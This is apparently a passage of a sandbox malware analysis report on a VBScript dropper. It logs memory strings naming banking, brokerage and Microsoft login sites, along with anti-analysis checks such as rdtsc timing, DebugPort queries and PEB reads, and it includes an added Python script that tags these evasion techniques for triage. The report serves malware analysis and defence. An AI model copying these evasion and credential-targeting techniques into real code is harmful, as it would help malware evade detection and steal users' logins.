Source: wscript.exe, 00000000.00000003.2237011145.000002AAA8628000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pBimoLvibqemuGW@
Source: 62v53-Zo.19.dr Binary or memory string: discord.comVMware20,11696487552f
Source: 62v53-Zo.19.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: wscript.exe, 00000000.00000003.2356219177.000002AAAA601000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pBimoLvibqemuGW
Source: 62v53-Zo.19.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 62v53-Zo.19.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: svchost.exe, 0000001B.00000002.3539084412.0000021B3DA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.3540606559.0000021B42E42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.3540671763.0000021B42E56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 62v53-Zo.19.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 62v53-Zo.19.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 62v53-Zo.19.dr Binary or memory string: global block list test formVMware20,11696487552
Source: 62v53-Zo.19.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 62v53-Zo.19.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 62v53-Zo.19.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: wscript.exe, 00000000.00000003.2355026871.000002AAA868D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2355751447.000002AAA86CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2356926443.000002AAAA501000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236842751.000002AAAA430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2356219177.000002AAAA601000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236789299.000002AAA86CA000.00000004.00000020.00020000.00000000.sdmp, Payment.vbs Binary or memory string: pBimoLvibqemuGW = "GNPOmRvLiTCWsbi"
Source: 62v53-Zo.19.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 62v53-Zo.19.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 62v53-Zo.19.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 62v53-Zo.19.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: mNqSPruzCXM.exe, 00000018.00000002.3536283378.00000000006AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
Source: powershell.exe, 00000008.00000002.2481444868.000001B5FF6D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWY
Source: 62v53-Zo.19.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 62v53-Zo.19.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 62v53-Zo.19.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 62v53-Zo.19.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 62v53-Zo.19.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 62v53-Zo.19.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 62v53-Zo.19.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 62v53-Zo.19.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 62v53-Zo.19.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 62v53-Zo.19.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 62v53-Zo.19.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 62v53-Zo.19.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 62v53-Zo.19.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 62v53-Zo.19.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
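The entries in this section are the sandbox's raw observations, and when triaging them it helps to separate routine runtime noise from the checks the payload actually performs. The Python script below is an added example, not part of the report and not the sandbox vendor's tooling: it parses lines in the `Source: <origin> <event kind>: <detail>` form used above (a handful of them are copied in as constructed sample input) and tags each with an evasion technique. The technique labels, the sleep thresholds and the hypervisor keyword list are this example's own assumptions. Two of the mappings deserve a word: `mov eax, dword ptr fs:[00000030h]` reads the PEB pointer from the TEB in 32-bit code, which is how fields such as BeingDebugged and the loader's module list are reached without an API call, and `Process queried: DebugPort` is the ProcessDebugPort class of NtQueryInformationProcess. The repeated sleep value 922337203685477 is exactly 2^63 divided by 10^4 (the report's display scale), which is best read as an indefinite wait rather than a timed sleep; the script labels it that way, so the powershell.exe sleep entries on their own count for much less than the rdtsc, DebugPort and PEB reads in appidtel.exe and convert.exe.

```python
"""Added triage example: tag sandbox behaviour lines with evasion techniques.
Technique names, thresholds and the hypervisor keyword list are assumptions
made for this example, not the sandbox's own signature names."""
import re

# Constructed sample: lines copied from the report section above, with the
# page's "Jump to behavior" link text left in to show the parser drops it.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0397D1C0 rdtsc 10_2_0397D1C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648 Thread sleep count: 2870 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2084 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: 62v53-Zo.19.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\convert.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039D539D mov eax, dword ptr fs:[00000030h] 10_2_039D539D
Source: C:\Windows\SysWOW64\convert.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
""".strip("\n").splitlines()

EVENT_KINDS = (
    "Process created", "Code function", "TID", "Thread delayed", "Process queried",
    "Binary or memory string", "Process information set", "Process information queried",
    "API/Special instruction interceptor", "Window found", "Window / User API",
    "File opened", "API coverage", "Last function",
)
LINE_RE = re.compile(
    r"^Source: (?P<origin>.+?) (?P<kind>" + "|".join(re.escape(k) for k in EVENT_KINDS)
    + r"): ?(?P<detail>.*?)(?: Jump to behavior)?$"
)
SLEEP_COUNT_RE = re.compile(r"Thread sleep count: (\d+) > (\d+)")
SLEEP_TIME_RE = re.compile(r"Thread sleep time: -(\d+)s >= -(\d+)s")
PING_RE = re.compile(r"PING\.EXE ping 127\.0\.0\.1 -n (\d+)", re.I)
VM_WORDS = ("vmware", "hyper-v", "qemu", "virtualbox", "vbox")   # assumed keyword list
INFINITE_WAIT = (1 << 63) // 10_000   # 922337203685477: 2^63 in the report's display scale


def classify(kind, detail):
    """Return (technique, note) for one event, or None when it is not evasion-related."""
    if kind == "Process created" and (m := PING_RE.search(detail)):
        # ping -n N to loopback waits about one second between echoes
        return "sleep via loopback ping", f"~{int(m.group(1)) - 1} s delay"
    if kind == "Code function":
        if re.search(r"\brdtsc\b", detail):
            return "timing check (rdtsc)", detail.split()[0]
        if "fs:[00000030h]" in detail:            # TEB+0x30 holds the PEB pointer on x86
            return "PEB access (fs:[30h])", detail.split()[0]
    if kind == "TID":
        if (m := SLEEP_COUNT_RE.search(detail)) and int(m.group(1)) > int(m.group(2)):
            return "sleep loop", f"{m.group(1)} sleeps"
        if m := SLEEP_TIME_RE.search(detail):
            observed, threshold = int(m.group(1)), int(m.group(2))
            if observed >= INFINITE_WAIT:         # indefinite wait, not a timed sleep
                return "infinite wait (not a timed sleep)", str(observed)
            if observed >= threshold:
                return "long sleep", str(observed)
    if kind == "Process queried" and detail == "DebugPort":
        return "debugger check (DebugPort)", ""
    if kind == "Binary or memory string":
        hit = next((w for w in VM_WORDS if w in detail.lower()), None)
        if hit:
            return "hypervisor artifact string", hit
    if kind == "Process information set" and "ERRORBOX" in detail:
        return "error-dialog suppression (SetErrorMode)", detail
    return None


def short_name(origin):
    """'C:\\...\\convert.exe' or 'convert.exe, <dump id>.sdmp' -> 'convert.exe'."""
    return origin.split(",")[0].rsplit("\\", 1)[-1]


def triage(lines):
    """Parse report lines; return ([(origin, technique, note)], [unparsed lines])."""
    findings, unparsed = [], []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            unparsed.append(line)
            continue
        hit = classify(m["kind"], m["detail"])
        if hit:
            findings.append((short_name(m["origin"]), hit[0], hit[1]))
    return findings, unparsed


def summarize(findings):
    """Techniques per origin, in first-seen order, for a quick per-process view."""
    out = {}
    for origin, technique, _ in findings:
        if technique not in out.setdefault(origin, []):
            out[origin].append(technique)
    return out


if __name__ == "__main__":
    found, skipped = triage(SAMPLE_LINES)
    for origin, techniques in summarize(found).items():
        print(f"{origin}: {', '.join(techniques)}")
    print(f"{len(found)} findings, {len(skipped)} unparsed lines")
```

Run as a script it prints one line per origin; feeding it the full "Malware Analysis System Evasion" section (the `Jump to behavior` link text is tolerated) groups the timing, debugger and PEB checks under appidtel.exe and convert.exe, while wscript.exe's file opens and the PowerShell waits fall out as noise. Extend VM_WORDS or add a branch in classify for any further event kind worth tracking.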
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\appidtel.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\convert.exe Process queried: DebugPort (2 identical entries)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0397D1C0 rdtsc 10_2_0397D1C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_004179B3 LdrLoadDll, 10_2_004179B3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039D539D mov eax, dword ptr fs:[00000030h] 10_2_039D539D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FE388 mov eax, dword ptr fs:[00000030h] 10_2_038FE388
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FE388 mov eax, dword ptr fs:[00000030h] 10_2_038FE388
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FE388 mov eax, dword ptr fs:[00000030h] 10_2_038FE388
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0395739A mov eax, dword ptr fs:[00000030h] 10_2_0395739A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0395739A mov eax, dword ptr fs:[00000030h] 10_2_0395739A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038F8397 mov eax, dword ptr fs:[00000030h] 10_2_038F8397
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038F8397 mov eax, dword ptr fs:[00000030h] 10_2_038F8397
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038F8397 mov eax, dword ptr fs:[00000030h] 10_2_038F8397
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0392438F mov eax, dword ptr fs:[00000030h] 10_2_0392438F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0392438F mov eax, dword ptr fs:[00000030h] 10_2_0392438F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039333A0 mov eax, dword ptr fs:[00000030h] 10_2_039333A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039333A0 mov eax, dword ptr fs:[00000030h] 10_2_039333A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039233A5 mov eax, dword ptr fs:[00000030h] 10_2_039233A5
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039BB3D0 mov ecx, dword ptr fs:[00000030h] 10_2_039BB3D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0390A3C0 mov eax, dword ptr fs:[00000030h] 10_2_0390A3C0 (6 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039083C0 mov eax, dword ptr fs:[00000030h] 10_2_039083C0 (4 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039BC3CD mov eax, dword ptr fs:[00000030h] 10_2_039BC3CD
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039863C0 mov eax, dword ptr fs:[00000030h] 10_2_039863C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039D53FC mov eax, dword ptr fs:[00000030h] 10_2_039D53FC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0391E3F0 mov eax, dword ptr fs:[00000030h] 10_2_0391E3F0 (3 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039363FF mov eax, dword ptr fs:[00000030h] 10_2_039363FF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h] 10_2_039103E9 (8 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039BF3E6 mov eax, dword ptr fs:[00000030h] 10_2_039BF3E6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03920310 mov ecx, dword ptr fs:[00000030h] 10_2_03920310
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0398930B mov eax, dword ptr fs:[00000030h] 10_2_0398930B (3 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393A30B mov eax, dword ptr fs:[00000030h] 10_2_0393A30B (3 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FC310 mov ecx, dword ptr fs:[00000030h] 10_2_038FC310
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039C132D mov eax, dword ptr fs:[00000030h] 10_2_039C132D (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0392F32A mov eax, dword ptr fs:[00000030h] 10_2_0392F32A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038F7330 mov eax, dword ptr fs:[00000030h] 10_2_038F7330
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FD34C mov eax, dword ptr fs:[00000030h] 10_2_038FD34C (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0398035C mov eax, dword ptr fs:[00000030h] 10_2_0398035C (5 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0398035C mov ecx, dword ptr fs:[00000030h] 10_2_0398035C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039CA352 mov eax, dword ptr fs:[00000030h] 10_2_039CA352
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h] 10_2_03982349 (15 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039D5341 mov eax, dword ptr fs:[00000030h] 10_2_039D5341
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038F9353 mov eax, dword ptr fs:[00000030h] 10_2_038F9353 (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03907370 mov eax, dword ptr fs:[00000030h] 10_2_03907370 (3 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039A437C mov eax, dword ptr fs:[00000030h] 10_2_039A437C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039BF367 mov eax, dword ptr fs:[00000030h] 10_2_039BF367
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393329E mov eax, dword ptr fs:[00000030h] 10_2_0393329E (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393E284 mov eax, dword ptr fs:[00000030h] 10_2_0393E284 (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03980283 mov eax, dword ptr fs:[00000030h] 10_2_03980283 (3 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039D5283 mov eax, dword ptr fs:[00000030h] 10_2_039D5283
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039892BC mov eax, dword ptr fs:[00000030h] 10_2_039892BC (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039892BC mov ecx, dword ptr fs:[00000030h] 10_2_039892BC (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039152A0 mov eax, dword ptr fs:[00000030h] 10_2_039152A0 (4 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039972A0 mov eax, dword ptr fs:[00000030h] 10_2_039972A0 (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039962A0 mov eax, dword ptr fs:[00000030h] 10_2_039962A0 (5 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039962A0 mov ecx, dword ptr fs:[00000030h] 10_2_039962A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039C92A6 mov eax, dword ptr fs:[00000030h] 10_2_039C92A6 (4 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0392F2D0 mov eax, dword ptr fs:[00000030h] 10_2_0392F2D0 (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h] 10_2_0392B2C0 (7 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0390A2C3 mov eax, dword ptr fs:[00000030h] 10_2_0390A2C3 (5 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039092C5 mov eax, dword ptr fs:[00000030h] 10_2_039092C5 (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FB2D3 mov eax, dword ptr fs:[00000030h] 10_2_038FB2D3 (3 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039BF2F8 mov eax, dword ptr fs:[00000030h] 10_2_039BF2F8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039102E1 mov eax, dword ptr fs:[00000030h] 10_2_039102E1 (3 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038F92FF mov eax, dword ptr fs:[00000030h] 10_2_038F92FF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h] 10_2_039B12ED (14 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039D52E2 mov eax, dword ptr fs:[00000030h] 10_2_039D52E2
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03937208 mov eax, dword ptr fs:[00000030h] 10_2_03937208 (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038F823B mov eax, dword ptr fs:[00000030h] 10_2_038F823B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039D5227 mov eax, dword ptr fs:[00000030h] 10_2_039D5227
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0398D250 mov ecx, dword ptr fs:[00000030h] 10_2_0398D250
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03906259 mov eax, dword ptr fs:[00000030h] 10_2_03906259
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039BB256 mov eax, dword ptr fs:[00000030h] 10_2_039BB256 (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038F9240 mov eax, dword ptr fs:[00000030h] 10_2_038F9240 (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03988243 mov eax, dword ptr fs:[00000030h] 10_2_03988243
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03988243 mov ecx, dword ptr fs:[00000030h] 10_2_03988243
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393724D mov eax, dword ptr fs:[00000030h] 10_2_0393724D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FA250 mov eax, dword ptr fs:[00000030h] 10_2_038FA250
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038F826B mov eax, dword ptr fs:[00000030h] 10_2_038F826B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03941270 mov eax, dword ptr fs:[00000030h] 10_2_03941270 (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03929274 mov eax, dword ptr fs:[00000030h] 10_2_03929274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h] 10_2_039B0274 (12 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03904260 mov eax, dword ptr fs:[00000030h] 10_2_03904260 (3 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039CD26B mov eax, dword ptr fs:[00000030h] 10_2_039CD26B (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03957190 mov eax, dword ptr fs:[00000030h] 10_2_03957190
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0398019F mov eax, dword ptr fs:[00000030h] 10_2_0398019F (4 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03940185 mov eax, dword ptr fs:[00000030h] 10_2_03940185
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039BC188 mov eax, dword ptr fs:[00000030h] 10_2_039BC188 (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FA197 mov eax, dword ptr fs:[00000030h] 10_2_038FA197 (3 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0391B1B0 mov eax, dword ptr fs:[00000030h] 10_2_0391B1B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039B11A4 mov eax, dword ptr fs:[00000030h] 10_2_039B11A4 (4 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393D1D0 mov eax, dword ptr fs:[00000030h] 10_2_0393D1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393D1D0 mov ecx, dword ptr fs:[00000030h] 10_2_0393D1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0397E1D0 mov eax, dword ptr fs:[00000030h] 10_2_0397E1D0 (4 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0397E1D0 mov ecx, dword ptr fs:[00000030h] 10_2_0397E1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039D51CB mov eax, dword ptr fs:[00000030h] 10_2_039D51CB
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039C61C3 mov eax, dword ptr fs:[00000030h] 10_2_039C61C3 (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039A71F9 mov esi, dword ptr fs:[00000030h] 10_2_039A71F9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039301F8 mov eax, dword ptr fs:[00000030h] 10_2_039301F8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039D61E5 mov eax, dword ptr fs:[00000030h] 10_2_039D61E5
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h] 10_2_039251EF (13 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039051ED mov eax, dword ptr fs:[00000030h] 10_2_039051ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039AA118 mov ecx, dword ptr fs:[00000030h] 10_2_039AA118
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039AA118 mov eax, dword ptr fs:[00000030h] 10_2_039AA118 (3 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039C0115 mov eax, dword ptr fs:[00000030h] 10_2_039C0115
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03901131 mov eax, dword ptr fs:[00000030h] 10_2_03901131 (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03930124 mov eax, dword ptr fs:[00000030h] 10_2_03930124
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FB136 mov eax, dword ptr fs:[00000030h] 10_2_038FB136 (4 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03998158 mov eax, dword ptr fs:[00000030h] 10_2_03998158
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03907152 mov eax, dword ptr fs:[00000030h] 10_2_03907152
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03906154 mov eax, dword ptr fs:[00000030h] 10_2_03906154 (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038F9148 mov eax, dword ptr fs:[00000030h] 10_2_038F9148 (4 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039D5152 mov eax, dword ptr fs:[00000030h] 10_2_039D5152
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FC156 mov eax, dword ptr fs:[00000030h] 10_2_038FC156
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03994144 mov eax, dword ptr fs:[00000030h] 10_2_03994144 (4 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03994144 mov ecx, dword ptr fs:[00000030h] 10_2_03994144
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03999179 mov eax, dword ptr fs:[00000030h] 10_2_03999179
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h] 10_2_038FF172 (21 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FD08D mov eax, dword ptr fs:[00000030h] 10_2_038FD08D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0392D090 mov eax, dword ptr fs:[00000030h] 10_2_0392D090 (2 occurrences in this function)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03905096 mov eax, dword ptr fs:[00000030h] 10_2_03905096
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393909C mov eax, dword ptr fs:[00000030h] 10_2_0393909C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0398D080 mov eax, dword ptr fs:[00000030h] 10_2_0398D080
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0390208A mov eax, dword ptr fs:[00000030h] 10_2_0390208A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039C60B8 mov eax, dword ptr fs:[00000030h] 10_2_039C60B8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039C60B8 mov ecx, dword ptr fs:[00000030h] 10_2_039C60B8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039980A8 mov eax, dword ptr fs:[00000030h] 10_2_039980A8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039D50D9 mov eax, dword ptr fs:[00000030h] 10_2_039D50D9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039820DE mov eax, dword ptr fs:[00000030h] 10_2_039820DE
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039290DB mov eax, dword ptr fs:[00000030h] 10_2_039290DB
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h] 10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039170C0 mov ecx, dword ptr fs:[00000030h] 10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0397D0C0 mov eax, dword ptr fs:[00000030h] 10_2_0397D0C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039420F0 mov ecx, dword ptr fs:[00000030h] 10_2_039420F0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FA0E3 mov ecx, dword ptr fs:[00000030h] 10_2_038FA0E3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039250E4 mov eax, dword ptr fs:[00000030h] 10_2_039250E4
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039250E4 mov ecx, dword ptr fs:[00000030h] 10_2_039250E4
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039860E0 mov eax, dword ptr fs:[00000030h] 10_2_039860E0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039080E9 mov eax, dword ptr fs:[00000030h] 10_2_039080E9
